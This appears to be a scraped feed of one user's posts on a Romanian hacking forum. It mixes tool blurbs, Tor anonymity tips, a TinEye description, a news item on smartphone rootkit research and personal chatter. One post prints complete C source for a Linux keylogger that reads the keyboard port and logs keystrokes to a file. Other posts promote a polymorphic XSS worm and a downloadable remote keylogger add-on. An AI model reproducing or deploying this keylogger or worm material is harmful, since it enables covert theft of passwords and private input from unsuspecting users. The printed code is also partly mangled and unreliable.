intrudes and malicious network traffic. It restricts information that comes to your computer from other computers, giving you more control over the data on your computer and providing a line of defense against people (hackers) or programs (including Viruses ,Worms ,Trojans ,Backdoors , key loggers and other Malware) that try to connect to your computer without invitation. You can think of a firewall as a barrier that checks information (often called traffic) coming from the Internet or a network and then either turns it away or allows it to pass through to your computer, depending on your firewall settings.” Download Malware Guard System FirewallTM here. source : pentestit.com
  15. http://rstcenter.com/forum/competitie-challenges/21253-begood-rst-anonymous-challenge-4.html#post137505
  16. ironic de la mine a plecat toata moda cu baywords xD i-am sugerat lu unu sa faca cont acolo, nu se tin loguri. poti face blog chiar underground, pe freenet sau pe tor ( domeniu .onion) dar nu vei avea expunere iar google nu le indexeaza. (freenet ar fi cea mai secure metoda prin care ai putea sa postezi informatii extrem de sensibile "pe net") daca alegi tor o sansa ai avea cu site-ul www.tor2web.com desi nici asta nu sta online prea mult, iar google face nazuri cand incearca indexarea site-urilor www.myblog.tor2web.com
  17. Pe scurt : urci o imagine, ii genereaza o semnatura digitala unica, cauta acea semnatura in baza lor de date, daca gaseste o imagine care are o semnatura asemanatoare ti-o returneaza. La ce poate fi folosit : 1. vrei sa gasesti o imagine cu o rezolutie mai buna 2. vrei sa stii unde pe net se gaseste o anumita imagine 3. cauti un om dupa o poza (nu poate [inca] sa recunoasca fe?e) 4. cauti aceeasi imagine doar in alt context. What is TinEye? TinEye is a reverse image search engine. You can submit an image to TinEye to find out where it came from, how it is being used, if modified versions of the image exist, or to find higher resolution versions. TinEye is the first image search engine on the web to use image identification technology rather than keywords, metadata or watermarks. For some real TinEye search examples, check out our Cool Searches page. How does TinEye work? When you submit an image to be searched, TinEye creates a unique and compact digital signature or 'fingerprint' for it, then compares this fingerprint to every other image in our index to retrieve matches. TinEye can even find a partial fingerprint match. TinEye does not typically find similar images (i.e. a different image with the same subject matter); it finds exact matches including those that have been cropped, edited or resized. Why use TinEye? There are many uses for TinEye, but here are a few: * Find out where an image came from, or get more information about it * Research or track the appearance of an image online * Find higher resolution versions of an image * Locate web pages that make use of an image you have created * Discover modified or edited versions of an image For some real examples of TinEye searches, check out our blog or Cool Searches page. TinEye Reverse Image Search ca exemplu puteti cauta imaginea mea de la avatar, si veti gasi variante cu rezolutie mai mare. 41 results - TinEye link ce expira in 72 ore.
  18. Polymorphic Cross-Site Scripting Worm As the title suggests here is a generic, polymorphic XSS worm. With each infection the worm re-encrypts itself using a basic XOR cipher. The only piece missing is the code that sends the obfuscated script (stored in the encoded variable) to it's next target, likely a persistent XSS vulnerability. Below is the complete source. To see it in action save the source to an HTML file then view it. The javascript outputted to the text area is the repackaged worm; to test the repackaged source, replace the javascript of the sample below with the encrypted code and view the page again. Downloads - prion-polymorphic-xss-worm - Project Hosting on Google Code //ironic e hostat de google
  19. ArchTrack - ArchWiki
  20. This video shows how easy is to make a remote keylogger as a firefox addon. With little knowlege on how to make a firefox addons and coding in javascript you can make a potentialy dangerous addon. You can read on how to make a firefox addon on: https://developer.mozilla.org/En/Developing_add-ons. And you can download files used in this video at: http://sites.google.com/site/netinfinityprojects/home/downloads/firefox-KL.tar.gz. Thanks go out to Netinfinity for submitting this video to us. Remote Keylogger Firefox Addon Tutorial
  21. #include /stdio.h #include /stdlib.h #include /unistd.h #include /sys/io.h #define KB_IO 0X60 #define KB_ST 0x64 #define SLEEP 50 char key(int code) { int i; int ascii_code[] = { 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 57}; int ascii_char[] = { '0', ''', 'ì', 'b', 't', 'q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p', 'è', '+', 'n', 'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'ò', 'à', '<', 'ù', 'z', 'x', 'c', 'v', 'b', 'n', 'm', ',', '.', '-', ' '}; for (i = 0; i < 42; i++) { if (code == ascii_code[i]) return ascii_char[i]; } } int main(int argc, char **argv) { int code = 0; int last = 0; FILE *file; if (!argv[1]) { fprintf(stderr, "%s n", argv[0]); exit(1); } if (!(file = fopen(argv[1], "w"))) { fprintf(stderr, "Impossibile scrivere sul file %sn", argv[1]); exit(2); } if (ioperm(KB_IO, 1, 1) == -1 || ioperm(KB_ST, 1, 1) == -1) { fprintf(stderr, "Impossibile accedere alla porta di I/O della tastieran"); exit(3); } while (1) { code = 0; if (inb(KB_ST) == 20) code = inb(KB_IO); if (code) { if (code != last) { last = code; if (key(code)) { fprintf(file, "%c", key(code)); fflush(file); } } } usleep(SLEEP); } return 0; } http://sprunge.us/TheA?c
  22. begood

    sex mult..:-/

    mai exact 27 28 si ?lmic
  23. cred ca am ascultat-o azi de peste 20 ori o_O
  24. begood

    sex mult..:-/

    Dubl? personalitate ?i mi-o dezvolt p'a treia
  25. (PhysOrg.com) -- Smart phones are becoming a common part of everyday life. Millions of Americans are using these powerful devices whose impressive capabilities and features rival that of desktop computers from just a few years ago, including new tools that can help simplify everyday tasks such as finding a parking garage or the nearest drycleaner. But suppose you're a criminal who wants to surreptitiously monitor someone's every move and even eavesdrop wherever they take their phone? Yes, as it turns out, there's an ap for that, too. Few smart phone users realize that the same characteristics that make these devices so useful can be can be hijacked and used against them. Recently, two researchers from Rutgers University, Vinod Ganapathy and Liviu Iftode, with support from the National Science Foundation tasked a group of graduate students with an intriguing challenge. Starting with the assumption that they had found a way to hack into a smart phone, the grad students were asked to take a smart phone platform commonly used by software developers and develop malicious applications that a user may not even notice. The team decided to inject software components known as rootkits into the phone's operating system. Rootkits are a particularly devious threat to a computer, because they attack the operating system itself. Traditional antivirus software, therefore, may not be able to detect them because they don't appear to be stand alone applications or viruses. Most desktop computers are protected from rootkits by something known as virtual machine monitor, but because of their limited size and limited energy resources, smart phones don't deploy these monitors, making it very difficult to know a rootkit attack has taken place. Once the rootkits were in place, the researchers were able to hijack a smart phone by simply sending it a text message. This allowed them to do things like quietly turn on the device's microphone, enabling them to hear what was going on in the room where the phone had been placed. Another attack trained the phone to use its GPS capabilities to report the phone's exact location without the user's knowledge. By turning on various high-energy functions, the team was even able to rapidly drain the phone's batteries, rendering it useless. The Rutgers team presented the results of their attempts to hack and hijack smart phones at the International Workshop on Mobile Computing Systems and Applications (HotMobile 2010). Ganapathy and Liviu say they haven't been approached by the makers of popular smart phone devices, but hopefully their research will help keep these new devices safe and sound. source and video : Can Clever Hackers Target Smart Phones?
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